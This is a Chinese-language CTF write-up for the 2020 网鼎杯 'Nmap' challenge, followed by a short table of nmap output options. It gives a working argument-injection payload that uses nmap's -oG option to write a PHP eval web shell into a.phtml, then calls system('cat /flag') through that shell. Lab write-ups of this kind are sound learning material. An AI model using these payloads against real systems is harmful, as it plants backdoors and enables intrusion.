[网鼎杯 2020 朱雀组]Nmap

image-20240516202056445

首先试试127.0.0.1

是可以进去的。但是没什么用。

换了几个,发现都是能进入

但是都只是

image-20240516202205136

而且这个页面会改变的只有hostname

尝试了一下ssti注入,发现没什么用

查阅发现这道题使用的通过nmap语句进行创建一个新的文件,并且将一句话木马传入其中,然后再进行命令执行

同时,我们发现,这道题禁用了php

所以构建

' <? echo @eval($_POST["a"]);?> -oG a.phtml '

oG是nmap语法,放到最后一起总结了

上传这个之后,我们发现被哔了

这是因为我们传上去的不是一个ip地址

所以我们这里要同时传一个可通过的地址上去

所以我们采用 | (前面当参数,执行后面)

最终构建payload:

127.0.0.1 | ' <? echo @eval($_POST["a"]);?> -oG a.phtml '

输入之后的同时,我们就创建了一个名为a的phtml文件

所以我们访问之后,post传参一个

a=system("cat /flag");

拿下!

Nmap:

选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

例:

选项-oG
将结果Grep保存。

nmap -F -oG test.txt 192.168.23.1

选项-oA
该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。

nmap -F -oA test 192.168.3.2